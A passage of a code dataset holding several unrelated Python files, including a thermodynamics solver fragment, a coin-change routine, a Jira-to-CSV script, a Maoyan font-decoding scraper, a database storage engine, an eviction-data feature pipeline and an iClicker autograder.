)**2\n\t\t\t\t\t\t\n\t\t\t\t\tDXBUB = 0.0\n\t\t\t\t\tDXDEW = 0.0\n\t\t\t\t\t\n\t\t\t\t\tfor I in range(1, BData.NC + 1): #DO 223 I=1,NC\n\t\t\t\t\t\tDXBUB = DXBUB + ( XLB[I] - XVB[I] ) **2\n\t\t\t\t\t\tDXDEW = DXDEW + ( XLD[I] - XVD[I] ) **2\n\t\t\t\t\t\t\n\t\t\t\t\tDXBUB = math.sqrt(DTSUMB/DXBUB)\n\t\t\t\t\tDXDEW = math.sqrt(DTSUMD/DXDEW)\n\t\t\t\t\tWTB = DXDEW / (DXDEW + DXBUB)\n\t\t\t\t\tWTD = DXBUB / (DXBUB + DXDEW)\n\t\t\t\t\t#============== END IF\n\t\t\t\t\n\t\t\t\tif (TLINEB/TLINED > 2.0 or TLINEB/TLINED < 0.5) :\n\t\t\t\t\tTLAVG = min(TLINEB,TLINED)\n\t\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\tTLAVG = (WTB*TLINEB+WTD*TLINED)\n\t\t\t\t\n\t\t\t\t#\n\t\t\t\t# COMPUTE NEXT GUESSES FOR COMPOSITION OF LIQUID AND VAPOR\n\t\t\t\t# AND CARRY OUT CORRESPONDING BUBBLE AND DEW POINT CALCULATIONS.\n\t\t\t\t#\n\t\t\t\t\n\t\t\t\tfor I in range(1,BData.NC + 1): # DO 224 I=1,NC\n\t\t\t\t\tXLB2I = X[I] + TLAVG * ( WTB * XQHB + WTD * XQHD)\t\\\n\t\t\t\t\t\t* ( WTB * ( XLB[I] - XVB[I] ) / TLINEB + WTD * ( XLD[I] - XVD[I] ) / TLINED)\n\t\t\t\t\t\t\n\t\t\t\t\tXVD2I = X[I] - TLAVG * ( WTB * (1.0 - XQHB ) + WTD * (1.0 - XQHD) )\t\\\n\t\t\t\t\t\t* ( WTB * ( XLB[I] - XVB[I]) / TLINEB + WTD * ( XLD[I] - XVD[I] ) / TLINED )\n\t\t\t\t\t\t\n\t\t\t\t\tXLB[I] = XLB2I\n\t\t\t\t\tXVD[I] = XVD2I\n\t\t\t\t\n\t\t\t\t# [P2, P3, P4, P5, P6, P8] = bublp ( P1, P2, P3, P7)\n\t\t\t\t[XLB,XVB, TBUB, VLBUB, VVBUB, LCRIT] = self.bublp (P, XLB, XVB, True) # CALL BUBLP (P,XLB,XVB, TBUB,VLBUB,VVBUB,.TRUE.,LCRIT)\n\t\t\t\t[XLD,XVD, TDEW, VLDEW, VVDEW, LCRIT] = self.bublp (P, XLD, XVD, False) # CALL BUBLP (P,XLD,XVD, TDEW,VLDEW,VVDEW, False,LCRIT)\n\t\n\t\t\t\t\n\t\t\t\t#[P5, P6, P7, P8] = self.hcvcps (P1, P2, P3, P4)\n\t\t\t\t[HLB, CV, CP, VSND] = self.hcvcps( 1, TBUB, VLBUB, XLB) # CALL HCVCPS (1,TBUB,VLBUB,XLB, HLB,CV,CP,VSND)\n\t\t\t\t[HVB, CV, CP, VSND] = self.hcvcps( 1, TBUB, VVBUB, XVB) # CALL HCVCPS (1,TBUB,VVBUB,XVB ,HVB,CV,CP,VSND)\n\t\t\t\t[HLD, CV, CP, VSND] = self.hcvcps( 1, TDEW, VLDEW, XLD) # CALL HCVCPS (1,TDEW,VLDEW,XLD, HLD,CV,CP,VSND)\n\t\t\t\t[HVD, CV, CP, VSND] = self.hcvcps( 1, TDEW, VVDEW, XVD) # CALL HCVCPS (1,TDEW,VVDEW,XVD, HVD,CV,CP,VSND)\n\t\t\t\t\n\t\t\t\t# loop ===260 CONTINUE\n\t\t\t\t\n\t\t\tif not b_python_flag:\n\t\t\t\tprint (BData.LUP, 'ROUTINE HPIN DID NOT CONVERGE; H,P,X:', H,P, X ) # print array x\n\t\t\t\t#1000 FORMAT (1X,'ROUTINE HPIN DID NOT CONVERGE; H,P,X:',2F12.4,5F8.5)\n\t\t\t\n\t\t\t# come at this point 280 CONTINUE\n\t\t\t#\n\t\t\t# SOLUTION HAS CONVERGED; WRITE OUTPUT VARIABLES.\n\t\t\t#\n\t\t\t\n\t\t\t#for I in range(1,BData.NC + 1): #DO 284 I=1,NC\n\t\t\t#\tXL[I] = XLB[I]\n\t\t\t#\tXV[I] = XVB[I]\n\t\t\tXL = XLB [:]\n\t\t\tXV = XVB [:]\n\t\t\t\n\t\t\tVL = VLBUB\n\t\t\tVV = VVBUB\n\t\t\tHL = HLB\n\t\t\tHV = HVB\n\t\t\tT = TBUB\n\t\t# END IF\n\t\t\n\t\tXQ=(H-HL)/(HV-HL)\n\t\t\n\t\treturn [T, XQ,XL,XV, VL,VV, HL,HV]\n\t\t\n\t# = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . \n\tdef U_Func (self, T,X,K,V,A,B,AP,BP,F ):\n\t\t#\n\t\t# FUNCTION SUBROUTINE FOR THE EVALUATION OF CHEMICAL POTENTIAL\n\t\t# (THE QUANTITY EVALUATED IS U/RT; ALSO SINCE ONLY DIFFERENCES\n\t\t# IN U ARE REQUIRED IN THE PROGRAM, ANY TERMS WHICH WOULD\n\t\t# CANCEL ARE OMITTED)\n\t\t#\n\t\t#\t FUNCTION U (T,X,K,V,A,B,AP,BP,F)\n\t\t#\t IMPLICIT REAL (A-H,O-Z)\n\t\t#\t COMMON /RDATA4/ R\n\t\t#\t COMMON /NCOMP/ NC\n\t\t#\t DIMENSION AP(5),BP(5),F(5,5),X(5)\n\t\tDA = -2.0 * A\n\t\tDB = BP[K] - B\n\t\tSQAK= math.sqrt( AP[K] )\n\t\t\n\t\tfor I in range (1, BData.NC + 1 ):# DO 120 I=1,NC\n\t\t\tDA = DA + 2.0 * X[I] * math.sqrt( AP[I] ) * SQAK\n\t\t\tif (I != K): DA= DA - 2.0 * X[I] * F[K][I] * SQAK * math.sqrt( AP[I] )\n\t\t\t#120 CONTINUE\n\t\t\n\t\tB4V = 4.0 * V - B\n\t\t\n\t\tU = - math.log(V) \t\\\n\t\t\t- ( math.log ( (V+B) / V ) * ( A * (1.0-DB/B) + DA ) \t\\\n\t\t\t+ A * (DB+B)/(V+B))/(B* BData.R * T)\t\\\n\t\t\t+ (8.0 * V * BP[K] *( 8.0 * V-B ) / B4V + B * (16.0 * V - 3.0 * B))/(B4V*B4V)\n\t\treturn U\n\n\t# = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . \n\n#-----------------------------------------------------------\n# Job \t\t\t: \n#\n# Editor\t\t: aymhenry@gmail.com\n#-----------------------------------------------------------\n\n","sub_path":"modules_test/Cycle2Py_Rev03/cycle_classes/Block2.py","file_name":"Block2.py","file_ext":"py","file_size_in_byte":94111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"140755482","text":"class MakingChange:\n def minimumCoins(self, money, coins):\n\n # Return 1 if money(coin) is found in the array\n if money in coins:\n return 1\n\n if money < 1:\n return 0\n\n return self.min_change(coins, money, [0] * (money + 1))\n \n def min_change(self, coins, rem, re_array):\n if rem < 0:\n return -1\n\n if rem == 0:\n return 0\n\n if re_array[rem] != 0:\n return re_array[rem]\n\n max_value = 90000\n min_value = max_value\n for coin in coins:\n cr = self.min_change(coins, rem - coin, re_array)\n\n if (cr >= 0 and cr < min_value):\n min_value = 1 + cr\n\n re_array[rem] = -1 if (min_value == max_value) else min_value\n\n return re_array[rem]\n\n# print(MakingChange().minimumCoins(11, [1, 2, 5]))\n","sub_path":"MakingChangeSE.py","file_name":"MakingChangeSE.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"15184805","text":"from im_team_modules.jira_manager import JiraManager\nfrom pandas import DataFrame\nfrom numpy import nan\nfrom datefinder import find_dates\nfrom im_team_modules.my_password import username, password\nimport sys\n\n\ndef createdataframe(jql):\n\n # Create instance of JiraTechFeas class\n techfeas = JiraManager(username, password)\n\n # Pass jql query to JiraTechFeas to return issues and store in object\n try:\n techfeas.searchissues(jql)\n except:\n techfeas.killsession()\n print(\"Error with jql query\")\n print(jql)\n return None\n\n # Create holder dataframe to append to in loop\n df = DataFrame(columns=[\"jira_issue\", \"pdf_tf_date\", \"jira_tf_date\", \"pdf_p_num\", \"desc_p_num\"])\n\n for issue in techfeas.issues:\n\n try:\n techfeas.nextissue()\n except KeyError:\n continue\n\n if techfeas.techfeas is not None:\n\n # PDF Tech Feas Date Processing\n try:\n tfpdfdate = techfeas.techfeas[\"Technical Feasibility Date:\"]\n tfpdfdate = [date for date in find_dates(tfpdfdate)][0]\n except TypeError: # catch if date is not in recognizable date format, return actual\n tfpdfdate = techfeas.techfeas[\"Technical Feasibility Date:\"]\n except KeyError: # catch if field does not exist, return NULL\n tfpdfdate = \"field doesn't exist\"\n except IndexError: # catch additional errors from find_dates robustness\n tfpdfdate = nan\n\n # PDF Project Number Processing\n try:\n pdfprojnum = techfeas.techfeas[\"Project Code:\"]\n except KeyError:\n pdfprojnum = \"field doesn't exist\"\n else: # If PDF was unable to open, return NULL values\n tfpdfdate = nan\n pdfprojnum = nan\n\n try: # Attempt to find TF date in Jira Description\n tfdescdate = techfeas.description[\"TF Document Date:\"]\n tfdescdate = [date for date in find_dates(tfdescdate)][0]\n except TypeError: # If unable to find date value, return actual\n tfdescdate = techfeas.description[\"TF Document Date:\"]\n except KeyError: # If TF Document Date field doesn't exist, return NULL\n tfdescdate = nan\n except IndexError: # catch additional errors from find_dates for robustness\n tfdescdate = nan\n\n try: # Attempt to return project code from Jira description\n descprojnum = techfeas.description[\"Project Code:\"]\n except KeyError: # If field does not exist, return NULL\n descprojnum = nan\n\n # Store new row of data for current Jira Issue\n new = DataFrame({\"jira_issue\": [issue], \"pdf_tf_date\": [tfpdfdate],\n \"jira_tf_date\": [tfdescdate], \"pdf_p_num\": [pdfprojnum], \"desc_p_num\": [descprojnum]})\n\n # Add new row of data to dataframe\n df = df.append(new, ignore_index=True)\n\n techfeas.killsession()\n\n df.to_csv(\"//hnagroup/pmo/Investment Management/python_executables/python_csv_outputs/tech_feas_dates.csv\")\n\n\nif __name__ == \"__main__\":\n\n f = open(\"pdfinspect.out\", \"w\")\n sys.stdout = f\n\n print(\"Running\")\n\n if len(sys.argv) > 0:\n createdataframe(sys.argv[1])\n\n f.close()\n","sub_path":"pdfinspect.py","file_name":"pdfinspect.py","file_ext":"py","file_size_in_byte":3298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"400707867","text":"from fontTools.ttLib import TTFont\n\n'''\n 9\n 4\n\n\n\n'''\n# 实例化font对象\n# font = TTFont('../data/maoyan2.woff')\n# font.saveXML('font2.xml')\n# 提取cmap节点\n# font_data_dict = font.getGlyphOrder()\n# print(font_data_dict)\n# 只要value\n# for value in font_data_dict.value:\n# print(value)\n\nimport requests\n\nimport re\n\nimport os\n\nfrom fontTools.ttLib import TTFont\n\n\nclass MaoYan():\n\n # 初始化需要的数据\n def __init__(self):\n\n self.url = 'http://maoyan.com/films/1209159'\n\n self.headers = {\n\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHT\"\n \"ML, like Gecko) Chrome/70.0.3538.110 Safari/537.36\",\n\n }\n\n # 发送请求\n def get_html(self, url):\n\n response = requests.get(url, headers=self.headers)\n\n return response.content\n\n # 下载woff字体文件\n\n def create_font(self, font_file):\n\n # 列出已下载文件\n\n file_list = os.listdir('./fonts')\n\n # 判断是否已下载\n\n if font_file not in file_list:\n # 未下载则下载新woff字体文件\n\n url = 'http://vfile.meituan.net/colorstone/' + font_file\n\n new_file = self.get_html(url)\n\n with open('./fonts/' + font_file, 'wb')as f:\n f.write(new_file)\n\n # 打开字体文件\n\n self.font = TTFont('./fonts/' + font_file)\n\n # 把获取到的数据用字体对应起来,得到真实数据\n\n def modify_data(self, data):\n\n # 打开自己保存的woff文件,设置映射关系\n\n font2 = TTFont(\"./95ebcb3e871c993e8014b6cf244c939b2088.woff\")\n\n keys = font2['glyf'].keys()\n\n values = list(' .0714682953')\n\n # 对应替换\n\n dict1 = dict((k, v) for k, v in zip(keys, values))\n\n font1 = self.font\n\n # 空字典,保存新的替换映射关系\n\n dict2 = {}\n\n for key in font1[\"glyf\"].keys():\n\n for k, v in dict1.items():\n\n # 通过比较 字形定义 填充新的name和num映射关系\n\n if font2[\"glyf\"][k] == font1[\"glyf\"][key]:\n dict2[key] = v.strip()\n\n break\n\n # 将获取到的网页数据中的&#x替换成uni\n\n for i in dict2:\n\n gly = i.replace('uni', '&#x').lower() + ';'\n\n if gly in data:\n data = data.replace(gly, dict2[i])\n\n return data\n\n # 获取数据\n\n def start_crawl(self):\n\n html = self.get_html(self.url).decode('utf-8')\n\n # 正则匹配字体文件\n\n font_file = re.findall(r'vfile\\.meituan\\.net\\/colorstone\\/(\\w+\\.woff)', html)[0]\n\n self.create_font(font_file)\n\n # 正则匹配评分\n\n star = \\\n re.findall(r'\\s+(.*?)\\s+', html)[0]\n\n star = self.modify_data(star)\n\n # 正则匹配想看的人数\n\n people = re.findall(r'(.*?)', html, re.S)[0]\n\n people = self.modify_data(people)\n\n # 正则匹配累计票房\n\n ticket_number = re.findall(\n r'
    \\s+(.*?)'\n r'(.*?)\\s+
    ',\n html)[0]\n\n ticket_number1 = self.modify_data(ticket_number[0])\n\n print('用户评分: %s' % star)\n\n print('评分人数: %s' % people)\n\n print('累计票房: %s' % ticket_number1, ticket_number[1])\n\n\nif __name__ == '__main__':\n maoyan = MaoYan()\n\n maoyan.start_crawl()\n","sub_path":"pachong/maoyan.py","file_name":"maoyan.py","file_ext":"py","file_size_in_byte":3676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"79338150","text":"#!/usr/bin/python\n\nimport string\nimport sys\nimport urllib2\nimport httplib\nimport logging\nimport Poem.django_logging\nfrom Poem import settings\nfrom Poem.poem import models\nfrom django.db import connection, transaction\nfrom xml.etree import ElementTree\n\nlogging.basicConfig(format='%(filename)s[%(process)s]: %(levelname)s %(message)s', level=logging.INFO)\nlogger = logging.getLogger(\"POEM\")\n\ndef main():\n \"Parses VO list provided by CIC portal\"\n\n try:\n ret = urllib2.urlopen(settings.CIC_VO_URL).read()\n except Exception as e:\n logger.error('VO card - '+'%s' % (e))\n sys.exit(1)\n try:\n Root = ElementTree.XML(ret)\n idcards = Root.findall(\"IDCard\")\n except Exception as e:\n logger.error('Could not parse VO card - '+'%s' % (e))\n sys.exit(1)\n if len(idcards) > 0:\n vos = []\n for vo_element in idcards:\n dict_vo_element = dict(vo_element.items())\n if dict_vo_element.has_key('Name') == False or dict_vo_element.has_key('Status') == False:\n logger.warning(\"vo card does not contain 'Name' and 'Status' attributes for %s\" % vo_element)\n else:\n if dict_vo_element['Status'].lower() == 'production' and dict_vo_element['Name'] != '':\n vos.append(dict_vo_element['Name'])\n else:\n logger.error(\"Error synchronizing VO due to invalid VO card\")\n sys.exit(1)\n\n voindb = set([(vo.name,) for vo in models.VO.objects.all()])\n if len(voindb) != len(vos):\n svos = set([(vo,) for vo in vos])\n cur = connection.cursor()\n if len(voindb) < len(vos):\n cur.executemany('INSERT INTO poem_vo VALUES (?)', svos.difference(voindb))\n logger.info(\"Added %d VO\" %\\\n (len(vos) - len(voindb)))\n elif len(voindb) > len(vos):\n cur.executemany('DELETE FROM poem_vo WHERE name IN (?)', voindb.difference(svos))\n logger.info(\"Deleted %d VO\" %\\\n (len(voindb) - len(vos)))\n transaction.commit_unless_managed()\n connection.close()\n else:\n logger.info(\"VO database is up to date\")\n\nmain()\n","sub_path":"poem/Poem/sync/poem-syncvo.py","file_name":"poem-syncvo.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"492946527","text":"from nba_api.stats.endpoints import teamyearbyyearstats\n\n# Input Examples\n# team_id = 1610612752 (Knicks)\n# year = \"2000-01\"\ndef get_year_stats(team_id, year):\n team_historic_data = teamyearbyyearstats.TeamYearByYearStats(team_id)\n df = team_historic_data.get_data_frames()\n result = df[0].query('YEAR==@year').head(1)\n return result","sub_path":"api/TeamYearByYearStats.py","file_name":"TeamYearByYearStats.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"216499675","text":"#!/usr/bin/python3\n\"\"\"This module defines a class to manage file storage for hbnb clone\"\"\"\n\nfrom models.base_model import Base\nfrom models.base_model import BaseModel\nfrom models.user import User\nfrom models.state import State\nfrom models.city import City\nfrom models.amenity import Amenity\nfrom models.place import Place\nfrom models.review import Review\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker, scoped_session\nfrom os import getenv\n\n\nclasses = {'User': User, 'Place': Place, 'Review': Review,\n 'State': State, 'City': City}\n\n\nclass DBStorage():\n \"\"\"new engine, sqlalchemy\"\"\"\n __engine = None\n __session = None\n\n def __init__(self):\n \"\"\"constructor\"\"\"\n self.__engine = create_engine(\"mysql+mysqldb://{}:{}@{}/{}\"\n .format(getenv('HBNB_MYSQL_USER'),\n getenv('HBNB_MYSQL_PWD'),\n getenv('HBNB_MYSQL_HOST'),\n getenv('HBNB_MYSQL_DB')),\n pool_pre_ping=True)\n self.reload()\n if getenv('HBNB_ENV') == 'test':\n Base.metadata.drop_all(bind=self.__engine, checkfirst=True)\n\n def all(self, cls=None):\n \"\"\"queries on the current database session\"\"\"\n objects = {}\n for current_class in classes.values():\n if current_class is cls or cls is None:\n for elem in self.__session.query(current_class).all():\n objects[elem.__class__.__name__+'.'+elem.id] = elem\n return objects\n\n def new(self, obj):\n \"\"\"add the object to the current database session\"\"\"\n self.__session.add(obj)\n\n def save(self):\n \"\"\" commit all changes of the current database session \"\"\"\n self.__session.commit()\n\n def delete(self, obj=None):\n \"\"\"delete from the current database session obj if not None\"\"\"\n if obj:\n self.__session.delete(obj)\n self.save()\n\n def reload(self):\n \"\"\" no lo se rik \"\"\"\n Base.metadata.create_all(self.__engine)\n session_fac = sessionmaker(bind=self.__engine, expire_on_commit=False)\n Session = scoped_session(session_fac)\n self.__session = Session\n\n def close(self):\n \"\"\"closes the current SQLAlchemy session\"\"\"\n self.__session.close()\n","sub_path":"models/engine/db_storage.py","file_name":"db_storage.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"56422705","text":"\"\"\"\nCore data pipeline for joining dataset and generating features\n\"\"\"\nimport logging\nimport csv\nimport math\n\nimport pandas as pd \nimport numpy as np\n\nfrom config import config\n\nlogging.basicConfig(level=logging.DEBUG)\n\n\nclass data_pipeline:\n \"\"\" Singleton Class for generating feature dataset from acs and evictionlab data \"\"\"\n\n def __init__(self):\n \"\"\" Empty Constructor \"\"\"\n pass\n\n\n def generate_dataset(self):\n \"\"\" Main function. Composes final dataset for machine learning from acs and eviction lab data \"\"\"\n acs_data_map = self.generate_acs_data_map()\n self.append_acs_data(acs_data_map)\n df = self.add_rate_features_and_drop_old_cols()\n self.impute_and_clean(df)\n self.split_data_by_year()\n return\n\n\n def generate_acs_data_map(self):\n cols_dict = config.acs_year_to_cols_map\n data_dict = {}\n\n for year in cols_dict:\n acs_data = open(config.acs_datasets_path + \"acs_\" + year[2:] + \".csv\")\n acs_reader = csv.reader(acs_data, delimiter=',')\n next(acs_reader, None)\n next(acs_reader, None)\n for row in acs_reader:\n county_fip = str(row[1])\n features = []\n features.append(row[cols_dict[year][1]])\n features.append(row[cols_dict[year][2]])\n features.append(float(row[cols_dict[year][3]])/float(row[cols_dict[year][0]]))\n features.append(float(row[cols_dict[year][4]])/float(row[cols_dict[year][0]]))\n if county_fip not in data_dict:\n data_dict[county_fip] = {}\n if year not in data_dict[county_fip]:\n data_dict[county_fip][year] = []\n data_dict[county_fip][year] = features\n acs_data.close()\n return data_dict\n\n\n def append_acs_data(self, acs_data_map):\n \"\"\"\n Appends ACS data to the eviction lab data rows.\n Inputs:\n acs_data_map (dict): Dictionary mapping of county and year to acs education and insurance data\n \"\"\"\n fp = config.intermediary_target_path \n evictions_df = pd.read_csv(config.eviction_lab_data_path)\n filtered_eviction_df = evictions_df[config.eviction_data['feature_cols']]\n\n output_csv = open(fp, 'w+')\n csv_writer = csv.writer(output_csv)\n feature_cols = config.eviction_data['feature_cols']\n csv_writer.writerow([\"GEOID\", \"year\"] + config.acs_data['feature_cols'] + config.eviction_data['feature_cols'][2:])\n for index, row in filtered_eviction_df.iterrows():\n county_fip = str(row['GEOID'])[0:5]\n curr_year = str(int(row['year']))\n if county_fip in acs_data_map and curr_year in acs_data_map[county_fip]:\n acs_data = acs_data_map[county_fip][curr_year]\n eviction_data = list(row)\n curr_row= [eviction_data[0], curr_year] + acs_data + eviction_data[2:]\n csv_writer.writerow(curr_row)\n\n return\n\n\n def add_rate_features_and_drop_old_cols(self):\n fp = config.intermediary_target_path\n filtered_eviction_df = pd.read_csv(fp)\n\n filtered_eviction_df[\"prev_year_eviction\"] = filtered_eviction_df[\"high_risk\"]\n\n # lag eviction features\n filtered_eviction_df[['eviction-filings', 'evictions','eviction-rate', 'eviction-filing-rate', \"prev_year_eviction\"]] = \\\n filtered_eviction_df[['eviction-filings', 'evictions','eviction-rate', 'eviction-filing-rate', \"prev_year_eviction\"]].shift(1)\n\n filtered_eviction_df[['eviction-filings-m2', 'evictions-m2','eviction-rate-m2', 'eviction-filing-rate-m2', 'prev_year_eviction-m2']] = \\\n filtered_eviction_df[['eviction-filings', 'evictions','eviction-rate', 'eviction-filing-rate', 'prev_year_eviction']].shift(1)\n\n filtered_eviction_df[['eviction-filings-m4', 'evictions-m4','eviction-rate-m4', 'eviction-filing-rate-m4', 'prev_year_eviction-m4']] = \\\n filtered_eviction_df[['eviction-filings', 'evictions','eviction-rate', 'eviction-filing-rate', 'prev_year_eviction']].shift(3)\n\n # drop rows before 2010\n filtered_eviction_df = filtered_eviction_df[filtered_eviction_df.year > 2009]\n filtered_eviction_df = filtered_eviction_df[ ['high_risk'] + [ col for col in filtered_eviction_df.columns if col != 'high_risk' ] ]\n\n return filtered_eviction_df\n\n\n @staticmethod\n def is_invalid_entry(entry):\n \"\"\" Determines if given single entry is invalid \"\"\"\n return (entry == \"\" or entry == \"(X)\" or (isinstance(entry, float) and math.isnan(entry)))\n \n\n @staticmethod\n def is_valid_row(row):\n \"\"\" Determines if an entire given row is invalid \"\"\"\n for j in range(len(row)):\n if data_pipeline.is_invalid_entry(row[j]):\n return False\n return True\n\n\n @staticmethod\n def clean_row_types(row):\n \"\"\" Clean types in rows \"\"\"\n for i in range(len(row)):\n if i <= 2:\n row[i] = str(int(row[i]))\n else:\n row[i] = float(row[i])\n return row\n\n\n @staticmethod\n def attempt_impute(prev_year, curr_year, next_year, prev_row, curr_row, next_row):\n if prev_year != curr_year-1 or next_year != curr_year+1:\n return None\n for i in range(3,len(curr_row)):\n if data_pipeline.is_invalid_entry(curr_row[i]):\n if not data_pipeline.is_invalid_entry(prev_row[i]) and not data_pipeline.is_invalid_entry(next_row[i]):\n curr_row[i] = (float(prev_row[i]) + float(next_row[i])) / 2.0\n else:\n return None\n return curr_row\n \n def impute_and_clean(self, filtered_eviction_df, output_path=config.final_unsplit_target_path, fill_na_median=False):\n output_csv = open(output_path, 'w+')\n csv_writer = csv.writer(output_csv)\n\n if fill_na_median:\n filtered_eviction_df[[col for col in filtered_eviction_df.columns]] = filtered_eviction_df[[col for col in filtered_eviction_df.columns]].fillna(filtered_eviction_df.median())\n\n prev_row = None\n prev_year = None\n curr_row = None\n curr_year = None\n\n for index, row in filtered_eviction_df.iterrows():\n next_row = list(row)\n next_year = int(row['year'])\n if curr_row is not None and not data_pipeline.is_valid_row(curr_row):\n impute = data_pipeline.attempt_impute(prev_year, curr_year, next_year, prev_row, curr_row, next_row)\n if impute is not None:\n curr_row = impute\n \n if prev_row is not None and data_pipeline.is_valid_row(prev_row):\n csv_writer.writerow(data_pipeline.clean_row_types(prev_row))\n\n prev_row = curr_row\n prev_year = curr_year\n curr_row = row\n curr_year = int(row['year'])\n\n for row in (prev_row, curr_row):\n if data_pipeline.is_valid_row(row):\n csv_writer.writerow(data_pipeline.clean_row_types(row))\n return\n\n\n def split_data_by_year(self):\n \"\"\" Split single data file into yearly files for temporal train-testing \"\"\"\n dataset = open(config.final_unsplit_target_path)\n reader = csv.reader(dataset, delimiter=',')\n \n f_handles = []\n writers = {}\n for year in config.acs_year_to_cols_map:\n f = open(config.yearly_target_path + str(year) + \".csv\", \"w+\")\n writer = csv.writer(f)\n f_handles.append(f)\n writers[year] = writer\n\n for row in reader:\n year = str(int(float(row[2])))\n writers[year].writerow(row)\n\n for f in f_handles:\n f.close()\n\nif __name__ == \"__main__\":\n d = data_pipeline()\n d.generate_dataset()\n\n","sub_path":"src/data_processing/dataset_pipeline.py","file_name":"dataset_pipeline.py","file_ext":"py","file_size_in_byte":7932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"392141218","text":"\"\"\"Autograde the iclicker remote submission.\"\"\"\nimport os\nimport sys\nimport json\n\n\nGLOBAL_INPUT_JSON_PATH = 'custom_validator_input.json'\n\n\ndef get_tc_json():\n \"\"\"Get the json for this testcase.\"\"\"\n try:\n with open(GLOBAL_INPUT_JSON_PATH) as json_file:\n tc = json.load(json_file)\n except Exception:\n return_error('Could not custom_validator_input.json')\n return tc\n\n\ndef get_actual_files():\n \"\"\"Load the actual files.\n\n To find actual files, we look for all of the files\n listed in the 'actual_file' section of this validator.\n \"\"\"\n try:\n with open(GLOBAL_INPUT_JSON_PATH) as json_file:\n tc = json.load(json_file)\n # Grab the folder housing the files.\n prefix = tc['testcase_prefix']\n except Exception:\n return_error('Could not custom_validator_input.json')\n\n # There can be either one actual file (a string) or\n # a list of actual files.\n if isinstance(tc['actual_file'], str):\n actual_files = list([os.path.join(prefix, tc['actual_file']), ])\n else:\n actual_files = list()\n for file in tc['actual_file']:\n actual_files.append(os.path.join(prefix, file))\n return actual_files\n\n\ndef return_result(score, message, status):\n \"\"\"Create response to student.\n\n This function should be used to return grading results to a student.\n\n Status success means the grader worked as intended (no validator\n failures) Data contains the students score (range from 0 to 1), a\n message to the student, and the status (color) for the\n message. Status can be 'information', ' 'warning', or 'success'.\n \"\"\"\n result = {\n 'status': \"success\",\n 'data': {\n 'score': score,\n 'message': message,\n 'status': status\n }\n }\n\n # print the json to stdout so that it can be read by submitty.\n print(json.dumps(result, indent=4))\n sys.exit(0)\n\n\ndef return_error(error_message):\n \"\"\"Create response to student.\n\n This function should be used to return an error message if the validator crashes.\n\n Status failure means the validator failed to process the student\n submission. Message contains an error message to be output for\n instructor/student debugging. This submission will receive a score of zero.\n \"\"\"\n result = {\n 'status': \"fail\",\n 'message': error_message\n }\n print(json.dumps(result, indent=4))\n sys.exit(0)\n\n\ndef main():\n \"\"\"Do the main thing.\"\"\"\n actual_files = get_actual_files()\n for file in actual_files:\n try:\n with open(file) as f:\n iclicker_string = f.read()\n iclicker_string = iclicker_string.replace('\\n', '')\n iclicker_ids = iclicker_string.split(',')\n\n for my_id in iclicker_ids:\n if \"T24\" in my_id:\n return_result(score=0,\n message=\"ERROR: '\" + str(my_id) +\n \"' looks like model number\",\n status='failure')\n if len(my_id) != 8:\n return_result(score=0,\n message=\"ERROR: '\" + str(my_id) +\n \"' is not 8 digits\",\n status='failure')\n\n return_result(score=1, message=\"success!\", status='success')\n\n except Exception:\n return_result(score=0,\n message=\"ERROR: Could not open output file.\"+str(file),\n status='failure')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"more_autograding_examples/iclicker_upload/config/custom_validation_code/grader.py","file_name":"grader.py","file_ext":"py","file_size_in_byte":3702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"188123590","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Date : 2018-05-24 15:13:31\n# @Author : Your Name (you@example.org)\n# @Link : http://example.org\n# @Version : $Id$\n\nimport os,sys\nimport json\nimport hashlib \n\nclass TreeObj(object):\n \"\"\"docstring for MTCLTree\"\"\"\n def __init__(self, baseData,layer,pid,maxdeep = 7): #默认深度为24小时\n super(TreeObj, self).__init__()\n self.baseState = baseData\n self.maxdeep = maxdeep\n self.stateCount = 1\n self.childLayer = layer\n self.stateList = []\n self.childTab = {}\n self.pid = pid #父节点id\n self.oid = self.createOIDWithPID() #当前节点id\n def createOIDWithPID(self):\n if self.pid == 0:\n return str(self.pid)\n oid = str(self.pid) + '_' + str(self.baseState)\n return oid\n\n def addStateList(self,plist):\n tmps = list(plist)\n scount = len(tmps)\n while tmps:\n frontstate = tmps.pop(0)\n scount -= 1\n if scount <= 0:\n if frontstate in self.childTab:\n self.childTab[frontstate].stateCount += 1\n else:\n if self.childLayer < self.maxdeep:\n # print('create',self.childLayer+1,frontstate)\n self.childTab[frontstate] = TreeObj(frontstate,self.childLayer + 1,self.oid,self.maxdeep)\n else:\n # print(self.childLayer+1,frontstate,tmps)\n self.childTab[frontstate].childAddStateList(tmps)\n # print('*'*10)\n def childAddStateList(self,plist):\n tmps = list(plist)\n scount = len(tmps)\n frontstate = tmps.pop(0)\n scount -= 1\n if scount <= 0:\n self.stateList.append(frontstate)\n if len(self.stateList) > self.maxdeep:\n self.stateList.pop(0)\n if frontstate in self.childTab:\n self.childTab[frontstate].stateCount += 1\n else:\n if self.childLayer < self.maxdeep:\n # print('create',self.childLayer+1,frontstate)\n self.childTab[frontstate] = TreeObj(frontstate,self.childLayer + 1,self.oid,self.maxdeep)\n else:\n # 